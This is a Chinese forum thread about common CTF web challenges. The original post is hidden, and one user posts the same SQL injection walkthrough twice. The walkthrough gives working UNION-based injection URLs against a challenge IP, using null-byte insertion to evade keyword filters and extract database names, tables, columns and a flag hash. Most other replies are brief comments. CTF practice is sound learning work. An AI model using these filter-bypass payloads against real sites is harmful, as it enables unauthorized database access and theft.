CTF常见Web题型

Aoyanm · 2018-8-7 09:34:45

学习学习

v5pingan · 2018-8-8 21:21:25

tmdsb123 发表于 2017-5-10 03:00
惭愧啊，第一个注入都解不出来，注入：http://103.238.227.13:10087/
过滤了select和from 的情况下还怎么 ...

过程如下：

获取数据库  结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#

获取表结果为  hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#

获取字段 key 表中的字段结果为 id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#

获取最后结果  1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef    (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#

v5pingan · 2018-8-8 21:24:16

iossa 发表于 2017-9-6 13:02
求解第一题web题

过程如下：

获取数据库  结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#

获取表结果为  hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#

获取字段 key 表中的字段结果为 id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#

获取最后结果  1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef    (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#

mtller · 2018-12-28 11:00:29

错字体有一点

Mr.轻熟男 · 2019-1-1 16:00:31

没赶上？~这怎么都看不到了？~~

montgo · 2019-1-5 13:44:18

为什么这么多: 作者被禁止或删除内容自动屏蔽

qq261893662 · 2019-2-22 15:20:26

学习下啊啊

hudunsec · 2019-2-27 20:18:05

请问怎么看不了？

guozhi · 2019-3-8 19:37:13

怎么看不了内容呢

ants · 2019-3-27 23:13:53

怎么看不了内容呢